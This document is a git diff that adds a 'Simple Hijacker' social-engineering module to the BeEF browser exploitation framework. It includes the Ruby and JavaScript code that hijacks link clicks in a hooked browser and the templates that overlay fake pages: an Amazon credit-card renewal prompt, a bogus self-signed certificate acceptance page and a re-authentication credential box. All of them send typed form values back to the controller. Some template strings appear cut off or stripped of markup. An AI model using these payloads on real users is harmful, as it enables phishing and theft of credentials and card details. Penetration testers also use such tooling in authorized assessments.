diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
new file mode 100644
index 000000000..e924ebb41
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -0,0 +1,43 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+hijack = function(){
+ function send(answer){
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);
+ }
+ <% target = @targets.split(',') %>
+ $j('a').click(function(e) {
+ e.preventDefault();
+ if ($j(this).attr('href') != '')
+ {
+ if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{
+ <%
+ tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
+ file = File.open(tplpath, "r")
+ @template = file.read
+ %>
+
+ <%= @template %>
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
+ }
+ }
+ });
+}
+
+beef.execute(function() {
+ hijack();
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Hijacker ready, now waits for user action');
+});
diff --git a/modules/social_engineering/simple_hijacker/config.yaml b/modules/social_engineering/simple_hijacker/config.yaml
new file mode 100644
index 000000000..8fbb9209d
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ simple_hijacker:
+ enable: true
+ category: "Social Engineering"
+ name: "Simple Hijacker"
+ description: "Hijack clicks on links to display what you want."
+ templates: ["credential", "confirmbox", "amazon", "chromecertbeggar"]
+ authors: ["gallypette"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
new file mode 100644
index 000000000..6a40a85ed
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -0,0 +1,48 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Simple_hijacker < BeEF::Core::Command
+
+ def self.options
+
+ config = BeEF::Core::Configuration.instance
+ @templates = config.get('beef.module.simple_hijacker.templates')
+
+ # Defines which domains to target
+ data = []
+ data.push({'name' =>'targets', 'description' =>'list domains you want to hijack - separed by ,', 'ui_label'=>'Targetted domains', 'value' => 'beef'})
+
+ # We'll then list all templates available
+ tmptpl = []
+ @templates.each{ |template|
+ tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
+ raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
+ tmptpl<<[ template]
+ }
+
+ data.push({'name' => 'choosetmpl', 'type' => 'combobox', 'ui_label' => 'Template to use', 'store_type' => 'arraystore', 'store_fields' => ['tmpl'], 'store_data' => tmptpl, 'valueField' => 'tmpl', 'displayField' => 'tmpl' , 'mode' => 'local', 'emptyText' => "Choose a template"})
+
+ return data
+ end
+
+ #
+ # This method is being called when a zombie sends some
+ # data back to the framework.
+ #
+ def post_execute
+ save({'answer' => @datastore['answer']})
+ end
+
+end
diff --git a/modules/social_engineering/simple_hijacker/templates/amazon.js b/modules/social_engineering/simple_hijacker/templates/amazon.js
new file mode 100644
index 000000000..0c58ba121
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/amazon.js
@@ -0,0 +1,28 @@
+ beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+ $j(document).attr('title', $j(this).html());
+ document.body.scroll = 'no';
+ document.documentElement.style.overflow = 'hidden';
+
+ collect = function(){
+ answer = "";
+ $j(":input").each(function() {
+ answer += " "+$j(this).attr("name")+":"+$j(this).val();
+ });
+ send(answer);
+ }
+
+ // floating div
+ function writediv() {
+ sneakydiv = document.createElement('div');
+ sneakydiv.setAttribute('id', 'hax');
+ sneakydiv.setAttribute('display', 'block');
+ sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;');
+ document.body.appendChild(sneakydiv);
+ sneakydiv.innerHTML= '
Your credit card details expired, please enter your new credit card credential to continue shopping- Changes made to your payment methods will not affect orders you have already placed.
Please accept our new SELF®-Signed Certificate to ensure maximum security protection.
'+domain+' chose SELF® to protect your security. If your browser raise any warning after this one it means that it\'s not up-to-date. Accept this certificate then please consider updating your browser as soon as possible.
Security Enhanced Layer Factory®: because nobody of us cannot realize the full potential of the Internet, unless it is a reliable place to interact and to deal. Our dependence on computers and the Internet increases every day, like our vulnerability. Daily news reports confirm a clear and present danger to all the Internet users (worms, viruses, trojans, malware, cybercrime, cyber-terrorism and related threats). These threats, mainly the very sophisticated group work of organized crime, directly harm millions of Internet users have real confidence in the Internet. Every individual or the company using the Internet has a role in the restoring of trust. SELF® help people as customer or seller to feel safe by issuing SELF®-signed certificate that are build to last. With SELF® you will never be harmed again - Trust is our workship.
Security Enhanced Layer Factory®, SELF® and SELF® logo are registered trademarks.
';
+ toggleMoreInfo(true);
+ setDirectionSensitiveImages();
+ }
+
+ forward = function(){
+ send("User continuing to "+target);
+ timer=setInterval(function(){window.location = target;},500);
+ }
+
+ getDomain = function(url){
+ return url.match(/:\/\/(www\.)?(.[^/:]+)/)[2];
+ }
+
+ function $(o) {return document.getElementById(o);}
+
+ sendCommand = function(cmd) {
+ window.domAutomationController.setAutomationId(1);
+ window.domAutomationController.send(cmd);
+ }
+
+ toggleMoreInfo = function(collapse) {
+ if (collapse) {
+ $("more_info_long").style.display = "none";
+ $("more_info_short").style.display = "block";
+ } else {
+ $("more_info_long").style.display = "block";
+ $("more_info_short").style.display = "none";
+ }
+ }
+ setDirectionSensitiveImages = function () {
+ if (document.documentElement.dir == 'rtl') {
+ $("twisty_closed_rtl").style.display = "inline";
+ } else {
+ $("twisty_closed").style.display = "inline";
+ }
+ }
+
+ target = $j(this).attr('href');
+ domain = getDomain(target);
+ $j(document).attr('title', domain+" Security Enhanced Layer Factory® certificate acceptance");
+ writediv();
+
diff --git a/modules/social_engineering/simple_hijacker/templates/confirmbox.js b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
new file mode 100644
index 000000000..d8c79bc7b
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/confirmbox.js
@@ -0,0 +1,10 @@
+var answer = confirm("Do you really want to leave us ??")
+if (answer){
+ alert("Okay :(")
+ send("User chose to leave.");
+ window.location = $j(this).attr('href');
+}
+else{
+ alert("Okay enjoy ")
+ send("User chose to stay.");
+}
diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
new file mode 100644
index 000000000..d0b1eacb0
--- /dev/null
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
@@ -0,0 +1,105 @@
+ imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+ var answer= '';
+
+ beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+ $j(document).attr('title', $j(this).html());
+ document.body.scroll = 'no';
+ document.documentElement.style.overflow = 'hidden';
+
+ // set up darkening
+ function grayOut(vis, options) {
+ // Pass true to gray out screen, false to ungray
+ // options are optional. This is a JSON object with the following (optional) properties
+ // opacity:0-100 // Lower number = less grayout higher = more of a blackout
+ // zindex: # // HTML elements with a higher zindex appear on top of the gray out
+ // bgcolor: (#xxxxxx) // Standard RGB Hex color code
+ // grayOut(true, {'zindex':'50', 'bgcolor':'#0000FF', 'opacity':'70'});
+ // Because options is JSON opacity/zindex/bgcolor are all optional and can appear
+ // in any order. Pass only the properties you need to set.
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ // The dark layer doesn't exist, it's never been created. So we'll
+ // create it here and apply some basic styles.
+ // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div'); // Create the layer.
+ tnode.style.position='absolute'; // Position absolutely
+ tnode.style.top='0px'; // In the top
+ tnode.style.left='0px'; // Left corner of the page
+ tnode.style.overflow='hidden'; // Try to avoid making scroll bars
+ tnode.style.display='none'; // Start out Hidden
+ tnode.id='darkenScreenObject'; // Name it so we can find it later
+ tbody.appendChild(tnode); // Add it to the web page
+ dark=document.getElementById('darkenScreenObject'); // Get the object.
+ }
+ if (vis) {
+ // Calculate the page width and height
+ if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+ var pageWidth = document.body.scrollWidth+'px';
+ var pageHeight = document.body.scrollHeight+'px';
+ } else if( document.body.offsetWidth ) {
+ var pageWidth = document.body.offsetWidth+'px';
+ var pageHeight = document.body.offsetHeight+'px';
+ } else {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ }
+ //set the shader to cover the entire page and make it visible.
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ }
+
+ // function to send response
+ function win(){
+ document.getElementById('hax').innerHtml='
Thank you for re-authenticating, you will now be returned to the application
read more about the SELF® certification authority
